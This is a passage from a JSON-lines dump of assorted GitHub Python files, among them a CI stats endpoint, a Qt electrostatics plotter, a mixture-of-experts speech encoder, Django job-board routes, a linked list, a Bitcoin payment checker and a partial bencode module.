JobStep.result,\n ))\n\n context = []\n for result in Result.__members__.values():\n if result in (Result.unknown, Result.skipped):\n continue\n\n context.append({\n 'name': unicode(result),\n 'numBuilds': build_stats.get(result, 0),\n 'numJobs': job_stats.get(result, 0),\n 'numJobSteps': jobstep_stats.get(result, 0),\n })\n\n return context\n\n def get(self):\n cutoff = datetime.utcnow() - timedelta(hours=24)\n\n context = {\n 'statusCounts': self._get_status_counts(cutoff),\n 'resultCounts': self._get_result_counts(cutoff),\n }\n\n return self.respond(context, serialize=False)\n","repo_name":"dropbox/changes","sub_path":"changes/api/system_stats.py","file_name":"system_stats.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","stars":758,"dataset":"github-code","pt":"72"} +{"seq_id":"33938690783","text":"# This Python file uses the following encoding: utf-8\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\nfrom colour import 
Color\nimport matplotlib.colors as colors\nimport matplotlib.cm as cm\nimport matplotlib.patches as mpatches\nfrom matplotlib.figure import Figure\nfrom PySide2.QtWidgets import *\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nimport random\nimport matplotlib.path as path\n#import eBoundarySolver\nfrom pylib import eBoundarySolver\n#from PySide2.QtCore import Slots\n\n\n\nclass Electrostatics(QTabWidget):\n def __init__(self, parent=None):\n #QMainWindow.__init__(self)\n super(Electrostatics, self).__init__(parent)\n\n self.tab1 = QWidget(self)\n self.addTab(self.tab1, \"Tab 1\")\n self.figure = plt.figure(figsize=(10,5))\n self.resize(400,400)\n self.canvas = FigureCanvas(self.figure)\n self.filepath = \"\"\n\n layout = QVBoxLayout()\n layout.addWidget(self.canvas)\n self.tab1.setLayout(layout)\n\n self.inputline = QLineEdit(self)\n\n\n self.btn = QPushButton(\"Enter\")\n self.btn.clicked.connect(lambda:self.plot())\n layout.addWidget(self.btn)\n\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width,self.height)\n button = QPushButton(\"Click me\", self)\n button.setToolTip(\"Cheers\")\n button.move(100, 70)\n self.show()\n\n def plot(self):\n self.filepath = self.inputline.text()\n self.canvas.figure.clf()\n self.get_display()\n #ax = self.figure.add_subplot(111)\n #ax.plot(self.data, 'r-')\n self.create_grid()\n self.show_scalar_field()\n self.show_field_lines()\n self.show_equipotential()\n self.canvas.draw()\n\n # Reads from a specified csv file to a matrix\n def get_display(self):\n filename = self.filepath\n #filename = \"../Q2_SOR.csv\"\n #filename = \"../CSV_files/Q1.csv\"\n data = np.loadtxt(filename, dtype=str, delimiter=';')\n data = np.delete(data, -1, axis=1)\n data = data.astype(float)\n self.values = np.array(data)\n self.data = data\n\n\n # Establishes the 2D grid to display\n def create_grid(self):\n self.X = np.linspace(0, len(self.data[0,:]), len(self.data[0,:])+1)\n self.Y = np.linspace(0, len(self.data[:,0]), len(self.data[:,0])+1)\n\n\n def show_scalar_field(self):\n plt.pcolormesh(self.X, self.Y, self.values, cmap=plt.get_cmap(\"bwr\"))\n neg_patch = mpatches.Patch(color='red', label='-ve')\n pos_patch = mpatches.Patch(color='blue', label='+ve')\n plt.legend(handles=[neg_patch, pos_patch])\n\n\n def show_field_lines(self):\n dx, dy = np.gradient(self.data)\n dx = np.column_stack((dx[:,0], dx))\n dy = np.column_stack((dy[:,0], dy))\n #print(len(self.X))\n #print(len(self.Y[:-1]))\n #print(len(dx[0]))\n #print(len(dx))\n plt.streamplot(self.X, self.Y[:-1], dy, dx, color='black')\n\n\n\n def show_equipotential(self):\n #print(\"\\n\")\n #print(len(self.X))\n #print(len(self.Y))\n #eBoundaryPlotter.single_point(1,1,1)\n #print(len(self.values[0]))\n #print(len(self.values))\n plt.contour(self.X[:-1], self.Y[:-1], self.values, 15, colors=\"grey\", linestyles=\"solid\")\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = Electrostatics()\n main.show()\n sys.exit(app.exec_())\n","repo_name":"Spengarcor/numelectrostatics","sub_path":"QT/electrostatics_load.py","file_name":"electrostatics_load.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"21956844456","text":"from datetime import datetime, timedelta\n\n\ndef start_cron_job_notes_in_minutes():\n # 07:00 tomorrow; using timedelta avoids day + 1 overflowing on the last day of a month\n start_job_date = (datetime.now() + timedelta(days=1)).replace(hour=7, minute=0, second=0, microsecond=0)\n datetime_now = datetime.now()\n\n diff = start_job_date - datetime_now\n return diff.total_seconds() / 60\n\n\n# def cron_job_notes_recall():\n# data = query_user_notes()\n# if data:\n# data_to_send = preapare_data_for_sending(data)\n# result = send_email(data_to_send, nginx_host=app.config.get(\"NGINX_HOST\"))\n# if result:\n# logging.error(\"mail sent successfully\")\n# else:\n# logging.error(\"sending mail failed\")\n# else:\n# logging.info(\"CRON::: no data to send\")","repo_name":"wlapie40/reminder-app-py38","sub_path":"services/web/src/common/cron_job.py","file_name":"cron_job.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"72482243752","text":"import os.path\r\nimport argparse\r\nimport sys\r\n\r\n\r\nclass LogParser:\r\n\r\n @staticmethod\r\n def parse_log(input_file, string_to_find):\r\n out = []\r\n with open(input_file) as file:\r\n data = file.read()\r\n file.close()\r\n splitted = data.split( \"\\n\" )\r\n for word in splitted:\r\n if string_to_find in word:\r\n out.append(word)\r\n return out\r\n\r\n @staticmethod\r\n def get_parsed():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"File\")\r\n arg = parser.parse_args()\r\n return arg.File\r\n\r\n @staticmethod\r\n def save(file, out):\r\n with open(file, \"w\") as out_file:\r\n for line in out:\r\n out_file.write(line)\r\n out_file.write(\"\\n\")\r\n out_file.close()\r\n\r\nclass InputFileValidator():\r\n @staticmethod\r\n def validate(file_name):\r\n if os.path.isfile(file_name):\r\n return True\r\n else:\r\n sys.exit(\"file doesn't exist\")\r\n\r\n\r\nif __name__ == '__main__':\r\n File = LogParser.get_parsed()\r\n if InputFileValidator.validate(File):\r\n parsed = LogParser.parse_log(File, \"PrChecker.Downs\")\r\n LogParser.save(\"out.txt\", parsed)\r\n # os.system(\"jupyter notebook ./out_jupyter.txt\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"piotrcholody/Calculator","sub_path":"lab1/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"72228917994","text":"from typing import Tuple, List, Optional, Dict, Any\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.distributed as dist\n\nfrom model.encoder import BaseCTCEncoder\nfrom model.conformer import Net as ConformerEmbed\nfrom layer.encoder_layer import FmoeConformerLayer\nfrom layer.positionwise_feed_forward import PositionwiseFeedForward\nfrom layer.positionwise_feed_forward import FmoeCatEmbedFeedForward\nfrom layer.attention import MultiHeadedAttention\nfrom layer.attention import RelPositionMultiHeadedAttention\nfrom layer.convolution import ConvolutionModule\nfrom utils.common import get_activation\nfrom utils.mask import make_pad_mask\nfrom utils.mask import add_optional_chunk_mask\nfrom loss.loss_compute import MoELayerScaleAuxLoss\n\n\nclass Net(BaseCTCEncoder):\n def __init__(\n self,\n input_dim: int,\n output_dim: int,\n blank_idx: int = 0,\n attention_heads: int = 4,\n attention_dim: int = 256,\n linear_units: int = 2048,\n num_blocks: int = 6,\n dropout_rate: float = 0.1,\n positional_dropout_rate: float = 0.1,\n attention_dropout_rate: float = 0.0,\n input_layer: str = \"conv2d\",\n pos_enc_layer_type: str = \"rel_pos\",\n normalize_before: bool = True,\n concat_after: bool = False,\n static_chunk_size: int = 
0,\n use_dynamic_chunk: bool = False,\n use_dynamic_left_chunk: bool = False,\n macaron_style: bool = True,\n selfattention_layer_type: str = \"rel_selfattn\",\n activation_type: str = \"swish\",\n use_cnn_module: bool = True,\n cnn_module_kernel: int = 15,\n causal: bool = False,\n cnn_module_norm: str = \"batch_norm\",\n conv_subsample_in_ch: int = 1,\n embed_conf: Optional[Dict[str, Any]] = None,\n moe_conf: Optional[Dict[str, Any]] = None,\n embed_scale: float = 0.0,\n aux_scale: Optional[List[float]] = None\n ):\n super().__init__(\n input_dim, output_dim, blank_idx, attention_heads, attention_dim,\n linear_units, num_blocks, dropout_rate, positional_dropout_rate,\n attention_dropout_rate, input_layer, pos_enc_layer_type,\n normalize_before, concat_after, static_chunk_size,\n use_dynamic_chunk, use_dynamic_left_chunk, conv_subsample_in_ch)\n activation = get_activation(activation_type)\n # embedding network\n if embed_conf is None:\n embed_conf = {} # use default config of construction function\n self.embed = ConformerEmbed(input_dim, output_dim, **embed_conf)\n self.embed_scale = embed_scale\n # moe conf\n self.moe_conf = {\n 'rank': 0,\n 'world_size': 1,\n 'comm': None,\n 'num_experts': 4,\n 'hidden_units': 1024,\n 'dropout_rate': 0.0,\n 'activation': activation,\n 'capacity_factor': -1.0,\n 'router_regularization': 'l1_plus_importance',\n 'router_with_bias': False,\n 'keep_expert_output': False,\n 'rand_init_router': False\n }\n if moe_conf is not None:\n self.moe_conf.update(moe_conf)\n if self.moe_conf['router_regularization'] == 'l1_plus_importance':\n num_aux = 2\n if aux_scale is not None:\n assert len(aux_scale) == num_aux\n else:\n aux_scale = [0.1] * num_aux\n self.aux_tags = [\"sparse_loss\", \"balance_loss\"]\n aux_minimum = [num_blocks] * num_aux\n else:\n raise NotImplementedError(\"router regularization {} not supported\".format(\n self.moe_conf['router_regularization']))\n # aux criterion\n self.aux_criterion = MoELayerScaleAuxLoss(num_aux, aux_scale, aux_minimum)\n # attention layer\n if pos_enc_layer_type == \"no_pos\":\n selfattn_layer = MultiHeadedAttention\n else:\n selfattn_layer = RelPositionMultiHeadedAttention\n san_layer_args = (\n attention_heads,\n attention_dim,\n attention_dropout_rate,\n )\n # feed-forward module in conformer\n moe_positionwise_layer = FmoeCatEmbedFeedForward\n positionwise_layer = PositionwiseFeedForward\n positionwise_layer_args = (\n attention_dim,\n self.moe_conf['hidden_units'],\n self.moe_conf['dropout_rate'],\n activation,\n )\n # convolution module in attention\n convolution_layer = ConvolutionModule\n convolution_layer_args = (\n attention_dim,\n cnn_module_kernel,\n activation,\n cnn_module_norm,\n causal,\n )\n # encoder blocks\n embed_dim = self.embed.encoder_embed_dim\n self.blocks = torch.nn.ModuleList([\n FmoeConformerLayer(\n attention_dim,\n selfattn_layer(*san_layer_args),\n moe_positionwise_layer(attention_dim, embed_dim, **self.moe_conf),\n positionwise_layer(*positionwise_layer_args) if macaron_style else None,\n convolution_layer(*convolution_layer_args) if use_cnn_module else None,\n dropout_rate,\n normalize_before,\n concat_after,\n ) for _ in range(num_blocks)\n ])\n\n def init_embed_model(self, load_path):\n param_dict = torch.load(load_path, map_location='cpu')\n self.embed.load_state_dict(param_dict)\n\n def init_experts_from_base(self, load_path):\n param_dict = torch.load(load_path, map_location='cpu')\n model_dict = self.state_dict()\n load_param_list = []\n for k, v in model_dict.items():\n if k in 
param_dict and param_dict[k].size() == v.size():\n model_dict[k] = param_dict[k]\n load_param_list.append(k)\n elif \"experts\" in k:\n ori_k = k.replace(\"experts.\", \"\")\n if ori_k in param_dict and param_dict[ori_k].size() == v.size()[1:]:\n model_dict[k] = param_dict[ori_k].unsqueeze(0).expand(v.size())\n load_param_list.append(k)\n load_param_list.sort()\n self.load_state_dict(model_dict)\n return load_param_list\n\n def forward(\n self,\n xs: torch.Tensor,\n xs_lens: torch.Tensor,\n decoding_chunk_size: int = 0,\n num_decoding_left_chunks: int = -1\n ) -> Dict[str, Any]:\n \"\"\"\n Args:\n xs: padded input tensor (B, T, D)\n xs_lens: input length (B)\n decoding_chunk_size: decoding chunk size for dynamic chunk\n 0: default for training, use random dynamic chunk.\n <0: for decoding, use full chunk.\n >0: for decoding, use fixed chunk size as set.\n num_decoding_left_chunks: number of left chunks, this is for decoding,\n the chunk size is decoding_chunk_size.\n >=0: use num_decoding_left_chunks\n <0: use all left chunks\n \"\"\"\n masks = ~make_pad_mask(xs_lens).unsqueeze(1) # (B, 1, T)\n input_bk = xs\n xs, masks = self.subsampling(xs, masks)\n xs, pos_emb = self.pos_enc(xs)\n mask_pad = masks # (B, 1, T/subsample_rate)\n chunk_masks = add_optional_chunk_mask(xs, masks,\n self.use_dynamic_chunk,\n self.use_dynamic_left_chunk,\n decoding_chunk_size,\n self.static_chunk_size,\n num_decoding_left_chunks)\n # use the same chunk mask for embedding network\n embedding_res = self.embed(\n input_bk, xs_lens, given_chunk_mask=chunk_masks)\n embedding = embedding_res['hidden']\n embedding = embedding.detach()\n embed_out = embedding_res['out_nosm']\n\n aux_loss_collection = []\n for layer in self.blocks:\n xs, aux_loss_res, chunk_masks, _ = layer(\n xs, embedding, chunk_masks, pos_emb, mask_pad)\n for aux_loss in aux_loss_res:\n aux_loss_collection.append(aux_loss)\n if self.normalize_before:\n xs = self.after_norm(xs)\n out_nosm = self.out_linear(xs)\n out_lens = masks.sum(dim=-1).view(-1)\n res = {\n \"out_nosm\": out_nosm,\n \"out_lens\": out_lens,\n \"hidden\": xs,\n \"embed_out_nosm\": embed_out,\n \"aux_loss\": aux_loss_collection,\n }\n return res\n\n @property\n def metric_tags(self):\n tags = ['ctc_loss']\n if self.embed_scale > 0.0:\n tags += ['embed_ctc_loss']\n tags += self.aux_tags\n return tags\n\n def cal_loss(self, res, target, target_lens):\n out_nosm = res['out_nosm']\n out_lens = res['out_lens']\n embed_out_nosm = res['embed_out_nosm']\n aux_loss = res['aux_loss']\n # ctc\n loss, metric, count = self.ctc_criterion(\n out_nosm, out_lens, target, target_lens)\n # embed ctc\n if self.embed_scale > 0.0:\n loss_embed, metric_embed, count_embed = self.ctc_criterion(\n embed_out_nosm, out_lens, target, target_lens)\n loss += self.embed_scale * loss_embed\n metric += metric_embed\n count += count_embed\n # aux loss for moe routers\n loss_aux, metric_aux, count_aux = self.aux_criterion(aux_loss)\n loss += loss_aux\n metric += metric_aux\n count += count_aux\n return loss, metric, count\n\n def state_dict_comm(self):\n local_state_dict = self.state_dict()\n rank = self.moe_conf['rank']\n world_size = self.moe_conf['world_size']\n num_experts = self.moe_conf['num_experts']\n comm = self.moe_conf['comm']\n if world_size <= 1:\n return local_state_dict\n else:\n new_state_dict = OrderedDict()\n all_experts_num = world_size * num_experts\n for k, v in local_state_dict.items():\n if \"experts\" not in k:\n new_state_dict[k] = v\n else:\n new_size = list(v.size())\n new_size[0] = 
all_experts_num\n experts_weight = v.data.new_zeros(*new_size)\n experts_weight[rank * num_experts: (rank + 1) * num_experts] = v\n dist.all_reduce(experts_weight, group=comm, async_op=False)\n new_state_dict[k] = experts_weight\n return new_state_dict\n\n def load_state_dict_comm(self, whole_model_state):\n rank = self.moe_conf['rank']\n world_size = self.moe_conf['world_size']\n num_experts = self.moe_conf['num_experts']\n if world_size <= 1:\n return self.load_state_dict(whole_model_state)\n else:\n new_state_dict = OrderedDict()\n for k, v in whole_model_state.items():\n if \"experts\" not in k:\n new_state_dict[k] = v\n else:\n assert v.size(0) == num_experts * world_size\n new_state_dict[k] = v[rank * num_experts: (rank + 1) * num_experts]\n return self.load_state_dict(new_state_dict)\n","repo_name":"tencent-ailab/3m-asr","sub_path":"trainer/model/conformer_moe_catEmbed.py","file_name":"conformer_moe_catEmbed.py","file_ext":"py","file_size_in_byte":11484,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"72"} +{"seq_id":"25893471063","text":"import torch\nfrom torch import nn\nfrom . import utils\n\nimport normflows as nf\n\nclass ConvNet2d(nn.Module):\n \"\"\"\n Convolutional Neural Network with leaky ReLU nonlinearities and a\n final fully connected output layer\n \"\"\"\n\n def __init__(self, channels, output_units, kernel_size=3, stride=1,\n leaky=0.0, output_fn=None, init_zeros=False):\n \"\"\"\n Constructor\n :param channels: List of channels of conv layers, first entry is in_channels\n :param kernel_size: Int of list of ints, same for height and width, if int\n same kernel size for each layer is chosen\n :param output_units: List of two ints\n :param stride: Int or list of int, if int same stride for all layers is used\n :param leaky: Leaky part of ReLU\n :param output_fn: String, function to be applied to the output, either\n None, \"sigmoid\", or \"clampexp\"\n :param init_zeros: Flag whether last layer should be initialized with zeros\n \"\"\"\n super().__init__()\n # Prepare parameters\n n_layers = len(channels) - 1\n if isinstance(stride, int):\n stride = n_layers * [stride]\n if isinstance(kernel_size, int):\n kernel_size = n_layers * [kernel_size]\n # Build network\n net = nn.ModuleList([])\n for i in range(n_layers):\n net.append(nn.Conv2d(channels[i], channels[i + 1], kernel_size[i],\n stride=stride[i], padding=kernel_size[i] // 2))\n net.append(nn.LeakyReLU(leaky))\n net.append(nn.Flatten())\n lin = nn.Linear(*output_units)\n if init_zeros:\n nn.init.zeros_(lin.weight)\n nn.init.zeros_(lin.bias)\n net.append(lin)\n if output_fn == \"sigmoid\":\n net.append(nn.Sigmoid())\n elif output_fn == \"clampexp\":\n net.append(nf.utils.ClampExp())\n self.net = nn.Sequential(*net)\n\n def forward(self, x):\n if x.dim() == 3:\n x = x.view(-1, 1, x.size(1), x.size(2))\n return self.net(x)","repo_name":"VincentStimper/resampled-base-flows","sub_path":"larsflow/nets.py","file_name":"nets.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"41317401134","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'empregos'\nurlpatterns = [\n path('', views.home, name='home'),\n path('contas/login/', views.login_view, name='login'),\n path('contas/logout/', views.logout_view, name='logout'),\n path('contas/registro/', views.registro_view, name='registro'),\n path('vagas/', views.vagas_view, name='vagas'),\n path('vagas/criar', views.criar_vaga, name='criar_vaga'),\n path('vagas/deletar/<int:id>/', views.deletar_vaga, name='deletar_vaga'),\n path('editar_vaga/<int:id>/', views.editar_vaga, name='editar_vaga'),\n path('vagas/ver', views.ver_vagas, name='ver_vagas'),\n path('vagas/filtrar', views.filtrar_vagas, name='filtrar_vagas'),\n path('aplicar_vaga/', views.aplicar_vaga, name='aplicar_vaga'),\n path('cancelar_aplicacao/', views.cancelar_aplicacao, name='cancelar_aplicacao'),\n path('vagas_aplicadas/', views.vagas_aplicadas, name='vagas_aplicadas'),\n path('relatorio/', views.relatorio, name='relatorio'),\n]\n","repo_name":"rafafelli/projetovagas","sub_path":"empregos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"gl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"38545167837","text":"n = int(input())\narr = list(map(int,input().split()))\nif n==1:\n print(0)\nelse:\n lst= [0 for i in range(n)]\n for i in range(len(arr)):\n if arr[i] == 0:\n continue\n else:\n num = arr[i]\n for j in range(1,num+1):\n if (i+j) < n :\n if i==0:\n lst[i+j] = lst[i]+1\n elif lst[i+j] == 0 and lst[i]!=0:\n lst[i+j] = lst[i]+1\n else:\n lst[i+j] = min(lst[i]+1,lst[i+j])\n\n if lst[-1]!=0:\n print(lst[-1])\n else:\n print(-1)","repo_name":"mkdevelop5002/Cording_Test_record","sub_path":"bakjoon_11060.py","file_name":"bakjoon_11060.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"43134684439","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'xiaowang'\n__date__ = '19/11/15'\n\n\"\"\"Node class\"\"\"\n\n\nclass Node(object):\n def __init__(self, data):\n self.data = data\n self.nex = None\n\n\nclass LinkedList(object):\n def __init__(self):\n \"\"\"Initialize the linked list\"\"\"\n self.head = None\n\n \"\"\"Get the length of the linked list\"\"\"\n\n def __len__(self):\n pre = self.head\n length = 0\n while pre:\n length += 1\n pre = pre.nex\n return length\n\n \"\"\"Check whether the linked list is empty\"\"\"\n\n def is_empty(self):\n return False if len(self) > 0 else True\n\n \"\"\"Append a node\"\"\"\n\n def append(self, data):\n \"\"\"\n 1. if head is None: head-->node\n 2. else: tail.nex-->node\n :param data:\n :return:\n \"\"\"\n node = Node(data)\n if self.head is None:\n self.head = node\n else:\n pre = self.head\n while pre.nex:\n pre = pre.nex\n pre.nex = node\n\n \"\"\"Insert a node\"\"\"\n\n def insert(self, index, data):\n \"\"\"\n 1. index: insertion position, positive or negative\n 2. find the node at index-1 --> pre_node\n 3. pre_node.next-->node\n node.next-->pre_node.next.next\n 4. head\n :param index:\n :param data:\n :return:\n \"\"\"\n node = Node(data)\n if abs(index + 1) > len(self):\n return False\n index = index if index >= 0 else len(self) + index + 1\n if index == 0:\n node.nex = self.head\n self.head = node\n else:\n pre = self.get(index - 1)\n if pre:\n nex = pre.nex\n pre.nex = node\n node.nex = nex\n else:\n return False\n return node\n\n \"\"\"Reverse the linked list\"\"\"\n\n def __reversed__(self):\n \"\"\"\n 1. pre-->next becomes next-->pre\n 2. if pre is head, set pre.nex --> None\n 3. tail-->self.head\n :return:\n \"\"\"\n\n def reverse(pre_node, node):\n if pre_node is self.head:\n pre_node.nex = None\n if node:\n next_node = node.nex\n node.nex = pre_node\n return reverse(node, next_node)\n else:\n self.head = pre_node\n\n return reverse(self.head, self.head.nex)\n\n \"\"\"Get a node\"\"\"\n\n def get(self, index):\n \"\"\"\n :param index:\n :return:\n \"\"\"\n index = index if index >= 0 else len(self) + index\n if len(self) < index or index < 0:\n return None\n pre = self.head\n while index:\n pre = pre.nex\n index -= 1\n return pre\n\n \"\"\"Set a node\"\"\"\n\n def set(self, index, data):\n node = self.get(index)\n if node:\n node.data = data\n return node\n\n \"\"\"Delete an element\"\"\"\n\n def delete(self, index):\n f = index if index > 0 else abs(index + 1)\n if len(self) <= f:\n return False\n pre = self.head\n index = index if index >= 0 else len(self) + index\n prep = None\n while index:\n prep = pre\n pre = pre.nex\n index -= 1\n if not prep:\n self.head = pre.nex\n else:\n prep.nex = pre.nex\n return pre.data\n\n \"\"\"Clear the linked list\"\"\"\n\n def clear(self):\n self.head = None\n\n \"\"\"Print the linked list\"\"\"\n\n def show(self):\n pre = self.head\n while pre:\n print(pre.data, end=\" \")\n pre = pre.nex\n print()\n\n\nif __name__ == '__main__':\n ls = LinkedList()\n ls.append(1)\n ls.append(2)\n ls.append(3)\n ls.insert(-1, 10)\n ls.show()\n print(ls.get(-1).data)\n reversed(ls)\n ls.show()\n print(ls.get(0).data)\n ls.show()\n ls.delete(2)\n ls.show()\n ls.set(-12, 20)\n ls.show()\n","repo_name":"wangpanjun/datastructure","sub_path":"linkedlist/singleLinkedList.py","file_name":"singleLinkedList.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"}
{"seq_id":"9181937530","text":"from django.conf import settings\nfrom bip32utils import BIP32Key\nfrom datetime import datetime\nimport requests\nimport logging\n\nlogger = logging.getLogger('vitashop.checkout')\n\ndef get_currency(request):\n if 'currency' in request.session:\n return request.session['currency']\n else:\n return settings.PRIMARY_CURRENCY\n\ndef get_language(request):\n if hasattr(request, 'LANGUAGE_CODE'):\n return request.LANGUAGE_CODE\n else:\n return 'en'\n\ndef track_it(func):\n \"\"\"\n decorator for tracking / logging code use: @track_it\n \"\"\"\n def inner(*args, **kwargs):\n t1 = datetime.now()\n logger.debug('func %s started' % func.__name__)\n ret = func(*args, **kwargs)\n t2 = datetime.now()\n delta = t2 - t1\n duration = 'Process time: %sms' % int(delta.total_seconds() * 1000)\n logger.debug('func #%s# ended. 
%s' % (func.__name__, duration))\n return ret\n\n return inner\n\nclass Blockchain(object):\n\n SATOSHI = 100000000\n api_uri = 'https://insight.bitpay.com/api'\n #\n # {\"addrStr\": \"1DYCkkJePht4T3hpB68DBktv7AB97GnrwY\",\n # \"balance\": 0.00109326,\n # \"balanceSat\": 109326,\n # \"totalReceived\": 0.00109326,\n # \"totalReceivedSat\": 109326,\n # \"totalSent\": 0,\n # \"totalSentSat\": 0,\n # \"unconfirmedBalance\": 0,\n # \"unconfirmedBalanceSat\": 0,\n # \"unconfirmedTxApperances\": 0,\n # \"txApperances\": 1,\n # \"transactions\": [\"2806ec1144e3613d11756841648a7af39fe9405d3457a72af2df767979412a59\"]}\n\n @classmethod\n def get_address_info(cls, addr):\n r = requests.get('%s/addr/%s' % (cls.api_uri, addr))\n return r.json()\n\nclass Address(object):\n\n def __init__(self):\n self.desc = ''\n self.address = ''\n self.balance = 0\n self.unconfirmed_balance = 0\n\n\nclass Account(object):\n\n def __init__(self, xpub):\n self.addresses = []\n self.transactions = []\n self.mask = 'm/1/0/'\n self.account = BIP32Key.fromExtendedKey(xpub)\n self.ext_node = self.account.ChildKey(0)\n\n def gen_new_address(self, order_id):\n addr_node = self.ext_node.ChildKey(order_id)\n address = addr_node.Address()\n return address\n\n def check_order_for_payment(self, order):\n confirmed = 0\n try:\n addr = self.check_address_for_payment(order.wallet_address)\n confirmed = addr.balance / Blockchain.SATOSHI\n except Exception as ex:\n logger.error(ex)\n\n if confirmed >= order.price:\n return True\n else:\n return False\n\n\n def check_address_for_payment(self, address):\n j = Blockchain.get_address_info(address)\n a = Address()\n a.address = str(j['addrStr'])\n a.balance = int(j['totalReceivedSat'])\n a.unconfirmed_balance = int(j['unconfirmedBalanceSat'])\n return a\n","repo_name":"totoropy/joeshop","sub_path":"vitashop/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"1184220515","text":"# file_name: wake_up.py\n# file_function:\n# 1. run the eye-blink thread\n# 2. run the multiplication-table thread\n\n\nimport sys\nfrom threading import Thread\n\nsys.path.append('/home/pi/Wake_up_genie/python')\nprint(sys.path)\n\nimport call_genie as cg\nimport ai_eye_blink as eb\n\n\n\n\ndef main():\n\n\tt = Thread(target=cg.main) # multiplication-table thread\n\tth = Thread(target=eb.main) # eye-blink thread\n\tt.daemon = True\n\tth.daemon = True\n\tt.start() # start the multiplication-table thread\n\tth.start() # start the eye-blink thread\n\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"2021-KT-Intern-Team6/Wake-up-genie","sub_path":"ai_camera/wake_up.py","file_name":"wake_up.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"30188774478","text":"import requests\nfrom rest_framework.exceptions import ValidationError\nfrom RecipesAPI.constants import HUNTER_API_KEY, CLEARBIT_API_KEY\nimport clearbit\n\n\ndef email_validation(email):\n detected = False\n apiUrl = f'https://api.hunter.io/v2/email-verifier?email={email}&api_key={HUNTER_API_KEY}'\n\n response = requests.get(apiUrl)\n\n result = response.json()\n if result['data']['status'] not in ['verified', 'accept_all', 'webmail']:\n raise ValidationError({'message': 'This email is not valid!'})\n \n detected = True\n\n return detected\n\n\ndef clearbit_info(email):\n clearbit.key = CLEARBIT_API_KEY\n\n clearbit_data = clearbit.Person.find(email=email)\n\n return clearbit_data","repo_name":"MirkoMilanovic/Recipes_API","sub_path":"users/external_api.py","file_name":"external_api.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"73014091433","text":"#!/usr/bin/env python3.5\n\nimport collections\nimport itertools\n\ntry:\n rang = xrange\nexcept NameError:\n pass\n\n\ndef encode(obj):\n '''\n Bencode Python built-in types into data.\n '''\n\n if isinstance(obj, bytes):\n return b'%i:%s' % (len(obj), obj)\n elif isinstance(obj, int):\n contents = b'i%ie' % (obj)\n return contents\n elif isinstance(obj, list):\n values = b''.join([encode(o) for o in obj])\n return b'l%se' % (values)\n elif isinstance(obj, dict):\n items = sorted(obj.items())\n values = b''.join([encode(key) + encode(value)\n for key, value in items])\n return b'd%se' % (values)\n else:\n raise TypeError('Unsupported type: {0}.'.format(type(obj)))\n\n\ndef decode(data):\n '''\n Bdecode data into Python built-in types.\n '''\n\n return consume(LookaheadIterator([bytes([b]) for b in data]))\n\n\nclass LookaheadIterator(collections.Iterator):\n '''\n An Iterator that lets you peek at the next item.\n '''\n\n def __init__(self, iterator):\n self.iterator, self.next_iterator = itertools.tee(iter(iterator))\n\n self._advance()\n\n def _advance(self):\n self.next_item = next(self.next_iterator, None)\n\n def __next__(self):\n self._advance()\n\n return next(self.iterator)\n\n\ndef consume(stream):\n item = stream.next_item\n\n if item is None:\n raise ValueError('Decoding empty data is undefined')\n elif item == b'i':\n return consume_int(stream)\n elif item == b'l':\n return consume_list(stream)\n elif item == b'd':\n return consume_dict(stream)\n elif item.isdigit():\n return consume_str(stream)\n else:\n raise ValueError('Invalid bencode object type: ', item)\n\n\ndef consume_number(stream):\n result = b''\n\n while True:\n chunk = stream.next_item\n\n if not chunk.isdigit():\n return result\n elif result.startswith(b'0'):\n raise ValueError('Invalid number')\n\n next(stream)\n result += chunk\n\n\ndef consume_int(stream):\n if (next(stream)) 
